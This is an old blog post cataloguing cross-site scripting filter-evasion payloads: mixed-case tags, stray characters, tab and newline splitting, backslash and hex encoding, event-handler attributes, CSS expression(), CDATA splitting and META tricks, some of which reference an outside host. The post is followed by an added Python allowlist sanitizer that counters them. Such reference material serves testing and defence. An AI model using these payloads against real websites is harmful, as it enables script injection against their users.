Introduction to Cross Site Scripting (XSS) attack techniques

Posted 2012-12-31 09:59:28

1. Change the case of characters

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade a regular-expression check

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use an extension other than .js

    <script src="bad.jpg"></script>

4. Put the JavaScript in a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {
               background-image: url('javascript:alert("XSS");')
          }

5. Insert other characters inside the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>

6. Use a tab or a newline to evade

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab
         -> new line

7. Use "\" to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

8. Use hex encoding to evade (the ";" may also be removed)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

9. Script in an HTML tag (event-handler attributes)

    <body onload="alert('onload')">

        Event-handler attributes that work the same way: onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload

10. An SWF file containing the XSS code

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>

11. Use CDATA to split the XSS code and reassemble it

    <XML ID=I><X><C>

    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

    </C></X>

    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>

12. Use HTML+TIME

    <HTML><BODY>

    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

    <?import namespace="t" implementation="#default#time2">

    <t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">

    </BODY></HTML>

13. Write a cookie through META

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

14. JavaScript in src, href and url()

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}
    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

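Every technique listed above defeats a blacklist that pattern-matches raw text (case, stray characters, tab/newline, entity encoding, event handlers, style). As an added defensive example that is not part of the original post, the Python allowlist sanitizer below shows the alternative: the HTML parser normalises tag and attribute names before they are compared, every attribute not explicitly permitted (including all on* handlers and style) is dropped, and URL attributes are decoded and stripped of tab/CR/LF the way a browser's URL parser does before the scheme is checked. The tag/attribute allowlist and the scheme list are assumptions chosen for the demonstration.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

ALLOWED = {"b": set(), "i": set(), "p": set(), "a": {"href"}, "img": {"src", "alt"}}  # tag -> permitted attrs (demo assumption)
URL_ATTRS = {"href", "src"}
SAFE_SCHEMES = {"http", "https", "mailto"}  # demo assumption; javascript:, vbscript:, data: are deliberately absent
C0_AND_SPACE = "".join(chr(c) for c in range(0x21))

def safe_url(value):
    """Normalise as a browser does (entity-decode, drop tab/CR/LF, trim controls) BEFORE
    checking the scheme, so "jav<TAB>ascr<LF>ipt:" and "&#106;avascript:" are caught."""
    # unescape() is harmless if the value is already decoded and only errs toward rejecting
    v = html.unescape(value).replace("\t", "").replace("\n", "").replace("\r", "").strip(C0_AND_SPACE)
    scheme = urlsplit(v).scheme.lower()
    return v if scheme == "" or scheme in SAFE_SCHEMES else None  # relative or allowlisted only

class Sanitizer(HTMLParser):
    """Rebuild the fragment from allowlisted pieces only; HTMLParser hands over lower-cased
    tag/attribute names, so <sCript>, <SCRIPT/SRC=...>, ONLOAD= and STYLE= are judged after normalisation."""
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED:  # script, embed, xml, meta, iframe, body... all dropped
            return
        kept = []
        for name, val in attrs:
            if name not in ALLOWED[tag]:  # drops every on* handler, style, dynsrc, lowsrc
                continue
            if name in URL_ATTRS:
                val = safe_url(val or "")
                if val is None:  # javascript:, vbscript:, data: never reach the browser
                    continue
            kept.append(' %s="%s"' % (name, html.escape(val or "", quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <img ... /> needs no closing tag
    def handle_endtag(self, tag):
        if tag in ALLOWED:
            self.out.append("</%s>" % tag)
    def handle_data(self, data):
        self.out.append(html.escape(data, quote=True))  # text stays text in any context

def sanitize(fragment):
    p = Sanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.out)
```

Text inside a dropped element (for example the body of a removed script tag) is emitted as entity-encoded text, so it is displayed rather than executed; drop it entirely if that is preferred.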